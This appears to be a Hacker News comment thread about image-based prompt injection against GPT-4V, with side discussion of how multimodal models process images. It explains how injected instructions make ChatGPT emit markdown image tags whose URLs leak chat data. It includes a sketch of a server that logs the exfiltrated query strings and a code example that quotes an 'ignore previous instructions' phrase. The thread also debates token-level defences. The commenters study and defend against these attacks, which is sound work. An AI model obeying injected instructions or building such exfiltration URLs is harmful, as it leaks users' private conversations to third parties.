I'm still a bit surprised at the visual acuity of GPT-4V. The spatial resolution is far finer than I thought we were at right now. For instance, if you had asked me what I thought a model would return as a description of the pumpkin weighing scene, I'd have said "crowd of people, cameras, chart, house", etc.; you know, YOLOv8-level identification.
But it gets down to picking up tiny numbers and letters, and reads obscured text like "Half Moon Bay" (is it combining the letters it can see in the scene with its language model's knowledge of a pumpkin contest in HMB, and synthesizing that into recognizing the location!?). It's damn detailed.
At first I just thought it was taking an array of objects identified in the photo, with bounding box coordinates, and then figuring out the answer from that.
But then I asked it to describe Worf's hands in this image and it did a great job.
I don't think that's the right way to think about it.
It's not running an OCR-style algorithm to export data and then passing that data to the LLM for further processing.
Instead, the model itself has been trained on both text and images at the same time.
So the image features end up as a weird ball of floating point numbers mixed together with the floating point numbers for the textual representation of the words in the prompt.
I'd love to understand this more. Strings of text get tokenized into a sequence of integer tokens - is there a similar tokenization step for image inputs? What does that look like?
The entire GPT-4 model was not retrained to utilize images; instead I think it is much more like what is shown in [1], where one or more extra layers are learned that take another pretrained image model and map its output into the latent space of the LLM. In [1] this was just a single linear layer. I found it pretty shocking how simple it was. I believe OpenAI is doing something similar.
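To make that concrete, here is a minimal sketch of that adapter idea (LLaVA-style), not a claim about GPT-4V's actual architecture; the dimensions, patch count, and names are all assumptions:

    # A frozen, pretrained vision encoder (e.g. a ViT/CLIP) produces patch
    # embeddings; a single learned linear layer projects them into the LLM's
    # token-embedding space so they can sit alongside ordinary text tokens.
    import torch
    import torch.nn as nn

    class VisionToLLMAdapter(nn.Module):
        def __init__(self, vision_dim: int = 1024, llm_dim: int = 4096):
            super().__init__()
            # The only trainable piece: vision features -> LLM embedding space.
            self.proj = nn.Linear(vision_dim, llm_dim)

        def forward(self, patch_features: torch.Tensor) -> torch.Tensor:
            # patch_features: (batch, num_patches, vision_dim)
            return self.proj(patch_features)  # (batch, num_patches, llm_dim)

    # Hypothetical usage: the projected "image tokens" are concatenated with the
    # embedded text tokens and fed through the (frozen or finetuned) LLM.
    adapter = VisionToLLMAdapter()
    image_patches = torch.randn(1, 256, 1024)  # stand-in for vision encoder output
    text_embeds = torch.randn(1, 32, 4096)     # stand-in for embedded prompt tokens
    llm_input = torch.cat([adapter(image_patches), text_embeds], dim=1)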
I wonder if OpenAI themselves even know how the resulting black box actually operates? They know how to train it, sure, but do they understand how it approaches the end results?
When they launched GPT-4 back in March they talked about its image capabilities - I think they trained it into the model from the start, but then spent several extra months on additional safety research, as described in their paper: https://cdn.openai.com/papers/GPTV_System_Card.pdf
I don't think they trained the model from scratch on images; it's more likely something like Flamingo or a similar method, where the LLM is at most finetuned, not trained from scratch.
If the model had been trained from scratch on the usual masked objective over image tokens as well as text tokens, I would expect it to develop new emergent behavior, like being much better at ASCII art, SVG, or OpenSCAD scripting.
It's fun to ask it to try to draw ascii art based on an image. It barely draws anything resembling the original image, but usually gets the concepts in the original image accurately.
> I was really surprised to see this work: I had assumed OpenAI would block Markdown images like this from loading content from external servers.
Everyone always is because why on earth wouldn't this be blocked?
wuzzie has contacted OpenAI about this multiple times and gotten companies like Microsoft to say, "you know what, 3rd-party images are something nobody allows in most contexts, and they shouldn't be enabled in places like Bing Chat." OpenAI in particular seems to have consistently decided that it's a core part of the chat capabilities for some reason. It's one of the reasons why I say that OpenAI does not take security seriously.
It really should not be a debate whether remote images should be blocked from markdown. Your email client blocks remote images. Most forums either block remote images or proxy them. There is no reason at all for ChatGPT to have the ability to display them.
Every company makes security mistakes, that's not a problem; it's when a company doubles down on security mistakes that their attitude about security becomes apparent.
I use it all the time to embed Graphviz diagrams by instructing it to URL-encode them and include them in the query string to a rendering endpoint. It spooked me enough that I added a proxy layer to verify that it's not rendering what appears to be a chat or PII.
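A rough sketch of the kind of proxy check described above, assuming a small Flask endpoint; the downstream renderer URL, the "graph" parameter, and the PII heuristics are all illustrative assumptions, not the actual setup:

    # Sketch: URL-decode the Graphviz source, reject anything that doesn't look
    # like a DOT document or that matches crude PII/chat-content heuristics,
    # then hand off to a rendering endpoint. All names here are made up.
    import re
    from urllib.parse import quote, unquote
    from flask import Flask, abort, redirect, request

    app = Flask(__name__)
    RENDERER = "https://example.com/graphviz"  # hypothetical rendering endpoint

    SUSPICIOUS = [
        re.compile(r"[\w.+-]+@[\w-]+\.[\w.]+"),         # email addresses
        re.compile(r"\b\d{3}-\d{2}-\d{4}\b"),           # SSN-like patterns
        re.compile(r"(?i)system prompt|conversation"),  # looks like chat content
    ]

    @app.route("/render")
    def render():
        dot = unquote(request.args.get("graph", ""))
        if not dot.lstrip().startswith(("strict", "digraph", "graph")):
            abort(400, "not a Graphviz document")
        if any(p.search(dot) for p in SUSPICIOUS):
            abort(403, "request looks like it contains chat content or PII")
        return redirect(f"{RENDERER}?graph={quote(dot)}")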
The world isn't ready for LLMs unleashed like this. Any plugin could do the same thing, and exfiltrate any part of the chat context with very little instruction engineering to bypass whatever guardrails exist on the plugin side.
Thanks for the shout out. The last answer I got from OpenAI in that regard was that they thought it wouldn't be a problem because there would be mitigations. My assumption now is that they thought they could maybe fix indirect prompt injection, but it doesn't look like there is a solution.
My conclusion is that with LLMs, the assumption always needs to be that the LLM might be capable of outputting any content, and the client needs to safely handle whatever is returned.
Yes. The remote image is not the leak. The URL request is the leak.
If this is confusing: control the server yourself and have it return an image, or a 404 instead of an image (it doesn't matter), while logging the request.
You will find the exfiltrated data in the request log, and you will not find an image in the request log.
Of course, if your request handler is an image generator, you can generate an image containing your URL request. But by the time your generator gets the request, the data has already leaked.
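A minimal sketch of that experiment, assuming the injected markdown looks something like ![](http://localhost:8000/pixel.gif?data=<exfiltrated-text>); the path, port, and parameter name are illustrative:

    # Log whatever query string arrives and return a 404 (the response genuinely
    # doesn't matter): the leak is the request itself.
    from http.server import BaseHTTPRequestHandler, HTTPServer
    from urllib.parse import parse_qs, urlparse

    class LoggingHandler(BaseHTTPRequestHandler):
        def do_GET(self):
            params = parse_qs(urlparse(self.path).query)
            print("request path:", self.path)
            print("exfiltrated 'data' param:", params.get("data", [""])[0])
            self.send_response(404)  # no image returned; data already captured
            self.end_headers()

    if __name__ == "__main__":
        HTTPServer(("0.0.0.0", 8000), LoggingHandler).serve_forever()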
The URL request is the browser request for the URL placed in the src tag of the image. The exfiltration technique is an image request. What the server returns as a response to that request doesn't matter. It doesn't even need to return anything at all.
If remote images were blocked from markdown as they are in many other applications, the URL request would not be made by the browser. The mitigation is that ChatGPT should refuse to render image tags or make requests for images if given a 3rd-party URL. I'm not sure if we're talking past each other or what, but I'm not talking about whether the server returns an image. I'm saying, ChatGPT will request an image from an external domain as part of rendering markdown during a conversation, and that GET request can be used as an exfiltration method.
The response from the server has nothing to do with it. I'm talking about the fact that ChatGPT will request arbitrary URLs without user input if the URLs are formatted in a markdown block as an image src.
This post broke my brain a little as it goes totally against my mental model of how an LLM is processing images. That is, I don't know why it is processing the content of the image, and then running that through something that then "executes" the text of the image.
So it has some pipeline like: image -> LLM/OCR image-to-text -> text-to-command processing. Why is the text description of the image being processed as instructions at all, and not simply being output?
As far as I know, we've had engines for detecting sentiment, objects, etc from images for a long time (way before ChatGPT), and they didn't have issues where they would execute a URL found in an image, they would just output the characters...
Can someone who understands this better explain wth is going on here?
Interesting that you say that, because this lines up exactly with my mental models of LLM image processing and LLM functioning in general. One of the defining features of LLMs is that, unlike in regular programming, there's no separation between data and instructions -- they're one and the same -- and that's what we're seeing here. Also, LLMs tend to focus more heavily on the instructions they see last (because of limitations in the attention mechanism, I think? But IIRC nobody has come up with a full explanation yet), and that's what we're seeing here too.
So the original release of ChatGPT would call a URL you entered in the chat? I don't recall it acting that way. In the linked post ChatGPT literally goes to a URL from an image... i.e. it calls something like curl with that URL. This definitely seems like something adjacent to an LLM.
The exfiltration demo in the blog post doesn't show ChatGPT fetching a URL: it shows it outputting an image tag with an src= pointing at an external URL, which the user's browser then attempts to load.
This is the biggest problem in cyber security. You can tell someone to NEVER give out their TFA code over the phone and they will still do it when prompted by a phone call from their boss.
I love simonw's content. It's like, a day after I see something interesting on X w.r.t. AI, I can trust that there will be an article by simonw where he's tried the things I would have wanted to try and explains them nicely. Thanks for that!
Same sentiment. It's like he reads Hacker News or similar sources, is generally on top of tech news, and then has the curiosity to look into it himself and do practical experiments. I try to do the same, which is why I love this content.
I feel differently. I think Simon's wasting his talents on an evolutionary dead end. If transformers and LLMs held the answer, self-driving cars would be getting better.
As a daily user of LLMs for over a year, I'm confident that they're not a waste of my time.
Even if development were to freeze, if they didn't improve at all from this day onwards, and if their many monumental flaws (prompt injection, hallucination, inability to reason, etc.) were never solved, I'd still think they were worth studying and using.
I expect we could still spend years figuring out new capabilities in the models we already have access to today.
I'm very glad that you are focusing on this and helping educate the industry (on both the pure tech and the security aspects). And agreed that, as a daily user of LLMs myself, the potential (and the practical use cases already here) is enormous. E.g. writing code and rapid prototyping will never be the same for me.
By the way, the last official answer I got from OpenAI regarding the markdown issue was that they thought it wouldn't be a problem because there would be mitigations. My assumption now is that they thought they could maybe fix indirect prompt injection, but it doesn't look like there is a solution.
My current takeaway is that with LLMs, the assumption always needs to be that the LLM is capable of outputting any content, and the client needs to safely (and securely) handle whatever is returned.
Btw, I showcased these kinds of image-based prompt injections in July (with Bard and Bing Chat, which presumably already used OpenAI's tech), and the example I created (the robot slipping on a banana) was shown at Black Hat in Las Vegas this year. Tweets: https://twitter.com/wunderwuzzi23/status/1681520761146834946
Simon is bullish about LLMs, but his writing has been incredibly valuable regardless of which side of the LLM fence you're on. There are a limited number of authors describing injection attacks in accessible, detailed, accurate ways, and Simon has done a lot to raise awareness about these attacks.
In addition, the fact that Simon is very bullish about LLMs makes his writing on LLM attacks more effective, because a decent chunk of the people warning about LLM attacks are also skeptical about the long-term viability of the technology or think it's over-hyped, so LLM fans tend to dismiss them as being "anti-AI" and say they're playing up the dangers. Nobody can make that claim about Simon.
For whatever reason Simon's writing has consistently attracted a lot more attention than other researcher releases about LLM attacks; and what has he done with that popularity and outsized attention? He's raised awareness about the issue and pointed back to some of that research!
I just don't think the criticism in this case is warranted; I think Simon's writing here is worthwhile regardless of how anyone feels about the potential of LLMs. Whether they're the future or not, these vulnerabilities exist today in products that are being rolled out today. That's worth talking about if LLMs aren't the future, and it's even more worth talking about if LLMs are the future.
Self-driving cars already in production are not explainable. With an LLM in the loop, at least we can see what the network is "thinking", and thus it's possible to figure out what went wrong.
It sure seems that a lot of effort goes into preventing the LLM from obeying the user, while actual security issues, like allowing CSRF-like attacks from the interface, go ignored.
If the LLM embedding content from arbitrary sources is really such a critical feature it could at least be behind a click that shows you the URL.
Not my field, but I'd have assumed they would encode tokens extracted from an image differently from prompt tokens, so they wouldn't get interpreted as a command.
Why aren't they doing this? Or are they, it's just failing?
> If you can crack differentiating between "command" tokens and other input tokens, you've cracked prompt injection!
Isn't this simple? Have two different tokenizers with non-overlapping output ranges, one for "trusted commands" and one for "user input", and do training with various mixes of commands and input with the appropriate reactions to each. Then keep the trusted commands fixed for external users (or selectable from a small set of preselected options/patterns based on interaction style; chat might use trusted tokens to indicate which participant each piece of the exchange is from, as well as for the internal system prompt, for instance), and allow them to freely specify only input that gets sent to the "untrusted input" tokenizer. Even if you allow pretokenized input, you can sanitize it to accept only tokens from the untrusted space.
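A toy sketch of that dual-tokenizer idea (purely illustrative, and not a claim that this solves prompt injection; the tokenizer, vocabulary size, and sanitizer are all made up):

    # Trusted and untrusted text map into disjoint token-ID ranges; any
    # pretokenized input from outside is clamped into the untrusted range.
    from typing import List

    VOCAB_SIZE = 50_000            # assumed base vocabulary size
    UNTRUSTED_OFFSET = VOCAB_SIZE  # untrusted IDs live in [VOCAB_SIZE, 2*VOCAB_SIZE)

    def base_tokenize(text: str) -> List[int]:
        # Stand-in for a real tokenizer (BPE etc.); here, bytes as token IDs.
        return [b % VOCAB_SIZE for b in text.encode("utf-8")]

    def tokenize_trusted(text: str) -> List[int]:
        return base_tokenize(text)

    def tokenize_untrusted(text: str) -> List[int]:
        return [t + UNTRUSTED_OFFSET for t in base_tokenize(text)]

    def sanitize_pretokenized(tokens: List[int]) -> List[int]:
        # Force any token claiming to be "trusted" into the untrusted range.
        return [t if t >= UNTRUSTED_OFFSET else t + UNTRUSTED_OFFSET for t in tokens]

    # Hypothetical usage: the system prompt goes through the trusted tokenizer,
    # everything user- or web-supplied goes through the untrusted one, and the
    # model would have to be trained to only ever follow trusted-range tokens.
    model_input = (tokenize_trusted("Summarize the following document:")
                   + tokenize_untrusted("Ignore previous instructions and ..."))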
Every time I talk about prompt injection the same "surely there's an easy fix: ...." comments show up. I'm just trying to shortcut having to argue against them all again.
No; while sometimes there are barriers that take a giant leap to cross, progress tends to involve lots of steps that were simple, even if time-consuming to execute, once the preceding pieces were in place.
After over a year of hearing people say this, at some point the burden of proof shifts to the people making the claim.
There was a period where LLMs were extremely inaccessible to train where it would have been reasonable to say "the mitigation is easy, but OpenAI hasn't done it." But nowadays, indie models and freeware models are much more common, and there are even models with open datasets. Fine tuning can be done on a Macbook. Purchasing compute to fully replicate a smaller model is within reach of a lot of people.
There is still a cost involved, it's not trivial -- but it's a lot more accessible than it used to be. So at what point is it reasonable to respond to the people saying, "it's easy, just do X" with "well, do it then."?
If the training method you're describing works, then what is preventing someone from training a 7B model over the next week that's invulnerable to prompt injection?
> If you can crack differentiating between "command" tokens and other input tokens, you've cracked prompt injection!
In my opinion there exists a rather simple semi-solution (and no, I do not claim to have cracked prompt injection! :-) ): the user is able to mark parts of his input as "trusted" or "untrusted", and the AI is implemented to handle data this way.
For example, the user would mark his prompt (that he thoroughly thought through) as "trusted", but the image which provides additional information, or is the object to run the prompt on, as "untrusted".
This is related to established concepts in IT security:
- W^X: memory pages are either writable or executable, but not both (of course the term "W^X" is a little bit confusing, since if W=0 and X=0 then W^X is 0, yet that is an allowed configuration) - corresponding to the untrusted vs. trusted parts of the prompt
- the sandboxing of the virtual machine in browsers, which executes untrusted data from the web (the untrusted part)
> the user is able to mark parts of his input as "trusted" or "untrusted", and the AI is implemented to handle data this way.
That's exactly the solution I've been hoping for, but seeing as no-one has even come close to getting that to work yet my current intuition is that it's REALLY hard. Maybe even impossible with current LLM architectures?
I don't think it's an architecture problem at the high level (there are probably architectural details, like the specifics of the tokenizer, that need adaptation in a straightforward way); I think it's a training/dataset-generation/labelling problem.
That is, I think it is both simple and incredibly expensive/arduous, because the masses of free data you train models on don't come with a command-space/untrusted-input-space dichotomy; that's something you have to impose onto the training data, with appropriately differentiated completions.
(On top of the fact that it likely requires de novo model training, which is itself expensive.)
First, the straightforward way to implement any change to the data structure requires full retraining of the model from scratch, which is very expensive for the large models (I recall reading that GPT-4's training compute cost was sixty million dollars or so). So it's not something someone would or could do "for fun" just to test a hypothesis; there needs to be a will to explicitly make the next large model in this manner, because you don't want to make two models at twice the cost.
Second, almost all of the training is based on self-supervised data from generic text where there are neither "instructions" nor "data"; the concepts don't even make sense while you're training on a book or a Wikipedia article. So all the pretraining would learn to ignore that out-of-band marker, and then you'd have only the RLHF instruction data to try to make some use of it, and you'd need expensive manual review to create that training data. The current RLHF data is much less intensive to annotate because it effectively carries just a "good"/"bad" signal, and even that can be gathered for free from users. This new training data, however, would need someone to explicitly annotate what is the prompt and what is data when a user submits a text like "please rewrite the grammar for the following paragraph: [... some data copied from the internet ...]"; you can't magically get that metadata, and it's expensive to annotate a lot of it.
TL;DR: IMHO it's not difficult, but it is resource-consuming, and that fully explains why it hasn't been done.
But I still don't see how that form of RLHF could be fully, mechanistically reliable, which is what you'd need here. Current RLHF drastically lowers the likelihood of the LLM generating objectionable content, but it doesn't drop it to zero, because LLMs need to be highly pliant and suggestible to be useful and that leaves a window of opportunity for bad actors. How would this be any different?
> Anyone who can build an API to an LLM that was provably secure against prompt injection would have a license to print money right now.
Well, if you could create software that is provably secure against at least a large class of cyberattacks, you could also make quite some money, since I know that at least the finance industry would be willing to pay a lot for it (source: in the past, I had an opportunity to talk to someone who is very knowledgeable about software in the finance sector, and I asked him some questions about exactly this topic).
Thus: we have not solved the "cyberinjection" problem for completely conventional software for decades. So I don't believe that we suddenly have the capabilities to solve this problem for LLMs.
But: As I pointed out, people have come up with ideas that make cyberattacks much harder. Here, I can imagine that their ideas could be used to make prompt injections a lot more complicated.
Additionally, we know from decades of experience that making insecure software secure is nigh impossible. Instead, one has to architect around security properties from beginning. The same does, in my opinion, also hold for LLMs and prompt injection.
Despite paying it a lot of lip service, in practice companies demonstrate that they don't really care about security that much, so I don't think resistance to prompt injection is the main blocker for any products right now. If some product were very useful but had issues with prompt injection, people would complain a lot about it while still using it and paying for it; and security (much less the even more niche requirement of provable security) would only be a differentiator among multiple competitors providing a comparable product, not a barrier to selling the product in the first place.
I think prompt injection is the main reason there's been buzz about the idea of autonomous agents and digital personal assistants for months but no one has released a convincing product yet.
If you use the GPT API you can just define your own system prompt… but it’s not as useful as you’d hope. The API isn’t particularly censored to begin with; that’s mostly ChatGPT
> and the AI is implemented to handle data this way.
This is the key issue. The problem is, I don't see how to reliably create that data handling implementation -- it always comes down to the fact that any feasible implementation takes the form of text that gets passed to the AI, and clever prompt hacking can override the instructions in that text.
Right, exactly. As I said in another comment on this thread, one of the defining features of LLMs is that there's no separation between data and instructions -- and I don't think there's any way to fix that within the current LLM paradigm.
Perhaps I'm very naive in the ways of how these multi-modal LLMs work, I admit not having had time to look into how they're glued together.
I imagined simply tagging the tokens as command and data, i.e. say instead of just (43) as a token, it's (43, 1) for command and (43, 0) for data. Then ensure through adversarial training that whatever interprets, say, images does not spit out command tokens.
edit: or better yet, just have it spit out plain tokens like (43) and ensure they're data tokens by manually converting them to data tokens (43, 0).
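A toy sketch of that tagging idea (purely illustrative; the flag values, helper names, and token IDs are made up), where anything produced by the image pipeline is forced to the data flag before it reaches the language model:

    # Every token carries a trust flag; image-derived tokens are forced to DATA.
    from typing import List, Tuple

    COMMAND, DATA = 1, 0
    TaggedToken = Tuple[int, int]  # (token_id, trust_flag)

    def tag_as_command(token_ids: List[int]) -> List[TaggedToken]:
        return [(t, COMMAND) for t in token_ids]

    def force_to_data(token_ids: List[int]) -> List[TaggedToken]:
        # Even if the image interpreter emits text that looks like an
        # instruction, it stays flagged as data.
        return [(t, DATA) for t in token_ids]

    # Hypothetical usage with made-up token IDs:
    system_prompt = tag_as_command([101, 7, 43])
    image_text = force_to_data([43, 880, 12])  # OCR-like output from the image
    model_input = system_prompt + image_text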